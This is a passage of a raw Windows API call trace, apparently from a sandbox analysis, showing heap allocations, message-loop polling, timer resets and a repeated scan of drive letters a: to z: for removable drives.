hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0219.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.977] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.977] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.977] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.979] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.979] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.980] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.980] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.980] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.980] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.980] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.980] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.981] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.981] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.981] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.981] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.982] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.982] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.982] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.982] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.982] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.983] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.984] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.984] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.984] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.984] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.985] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0219.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0219.985] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.986] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0219.986] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0219.986] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.986] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.986] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.987] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0219.987] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0219.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.987] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.987] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.987] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.987] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.988] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.988] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.988] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.988] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.988] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.988] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.989] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.989] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.989] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.990] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.990] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.990] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.990] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.990] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.991] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.991] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.991] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.991] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.992] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.992] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.992] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.992] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.992] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.993] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.993] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.993] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.994] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.994] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.994] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.994] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.994] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.994] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0219.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0219.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0219.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.037] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0220.037] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0220.037] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0220.037] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.038] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.038] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.038] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.038] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.038] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0220.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.039] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.039] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.039] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.039] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.039] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.039] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.040] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.040] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.040] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.040] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.041] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.041] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.041] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.042] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.042] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.042] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.042] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.043] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.043] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.043] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.043] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.043] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.044] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.044] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.044] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.044] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.044] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.045] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 